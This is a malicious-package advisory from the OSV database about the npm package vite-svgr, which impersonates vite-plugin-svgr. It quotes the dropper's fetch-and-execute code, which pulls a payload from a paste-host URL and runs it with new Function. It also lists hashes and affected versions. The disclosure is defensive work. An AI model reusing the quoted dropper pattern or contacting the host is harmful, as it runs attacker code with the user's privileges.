MAL-2026-5708

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-svgr/MAL-2026-5708.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-5708

Published

2026-06-12T19:27:21Z

Modified

2026-06-12T20:01:57.882374057Z

Summary

Malicious code in vite-svgr (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5)

Package name vite-svgr impersonates the popular vite-plugin-svgr, but the shipped code is a fork of tsconfig-paths (package.json description: 'Load node modules according to tsconfig paths') with an added remote-code-execution dropper at lib/mapProps.js. The dropper performs axios.get('https://www.jsonkeeper.com/b/EQUBH', { headers: { 'x-secret-key': '_' } }) and then runs the response body's Cookie field via new Function('require', s)(require) — arbitrary JavaScript with full Node require access executed under the installer's user. The code is reachable from the package's main via the exported configJson(...), which spawns node lib/mapProps.js detached, so any consumer that imports this package and calls configJson triggers fetch-and-execute against an anonymous, mutable paste host. The combination of name impersonation, fork of an unrelated library, and remote-payload-execution is the canonical supply-chain attack shape.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-006215",
            "import_time": "2026-06-12T19:44:20.792697857Z",
            "sha256": "a22a309bc488d107fc2734705e05bb4032432bb9b54391e8ee2325d980b2cdf5",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:27:28Z",
            "versions": [
                "1.1.3"
            ]
        },
        {
            "id": "IN-MAL-2026-006214",
            "import_time": "2026-06-12T19:44:20.686148115Z",
            "sha256": "d238c0e37d7a415f10030826af53fbff9c537bfd527553c8005fd51f6499f0c4",
            "source": "amazon-inspector",
            "modified_time": "2026-06-12T19:27:21Z",
            "versions": [
                "1.1.2"
            ]
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / vite-svgr

Package

Name: vite-svgr; View open source insights on deps.dev
Purl: pkg:npm/vite-svgr

Affected ranges

Affected versions

1.*

1.1.2

1.1.3

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/vite-svgr/MAL-2026-5708.json"

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "path": "lib/mapProps.js",
            "sha256": "cbb95b591c97bbdc1a2f6aa41c118be14ed1e53eee6d05740317ce58942da860",
            "tlsh": "8c21124f757ca0a8017013f5672be426f965643f300290d5739c87a21f3655d6142fde"
        },
        {
            "path": "package.json",
            "sha256": "4d4f104d657b848c012ccc74af88f8769891687cf6dee211688403cfe6313929",
            "tlsh": "e041b924c928cdb365c0526a787d5681e238444b4d99fc08b3e5536e4f4c2bf62b57ae"
        }
    ],
    "package_integrity": [
        {
            "filename": "vite-svgr-1.1.3.tgz",
            "hashes": {
                "sha512_sri": "sha512-sHDAZ7u5LzJv7qMMawgKsqLRRh3xlnE5ryc/1M0p6kqjSVCpEGjLvcF/xwt+9zUsoeD8fGa57Z0CgaH8jgxtCg==",
                "sha1": "c11089a280629728d200c5267bb619eb6d0ead2f"
            }
        }
    ]
}